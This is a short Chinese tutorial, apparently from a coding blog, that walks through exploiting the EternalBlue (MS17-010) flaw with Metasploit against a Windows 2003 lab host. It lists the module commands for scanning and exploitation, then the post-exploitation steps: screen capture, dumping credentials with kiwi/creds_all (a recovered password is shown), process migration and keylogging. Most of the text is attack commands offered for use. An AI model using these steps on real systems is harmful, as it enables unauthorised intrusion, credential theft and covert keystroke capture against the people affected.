永恒之蓝-永恒之蓝漏洞（linux）-爱代码爱编程

开启msfconsole

搜索载荷，永恒之蓝的载荷是ms17_010
search ms17_010
然后use auxiliary/scanner/smb/smb_ms17_010 使用载荷，这个不是攻击载荷，这个是查看的有没有漏洞的，然后show options

set RHOSTS 192.168.132.129 添加host

set之后 run一下，是存在这个漏洞的
换成攻击载荷
use exploit/windows/smb/ms17_010_psexec

run之后拿到目标主机

拿到之后可以
1、获取屏幕数据screenshot

目标主机的屏幕数据保存在了root/JPGlloBJ.jpeg中了

打开图


2、除了截取屏幕还可以获取密码
先load kiwi加载字典后
creds_all查看密码是auscoo

3、记录键盘信息
先查看进程ps | grep explorer.exe

进程是540，监听进程migrate 540

然后run post/windows/capture/keylog_recorderj就可以监听键盘了
win2003随便输入后

kali中ctrl+c退出后

读取到的键盘内容被保存在/root/.msf4/loot/20230402110004_default_192.168.132.129_host.windows.key_145354.txt
cat命令查看一下

4、shell权限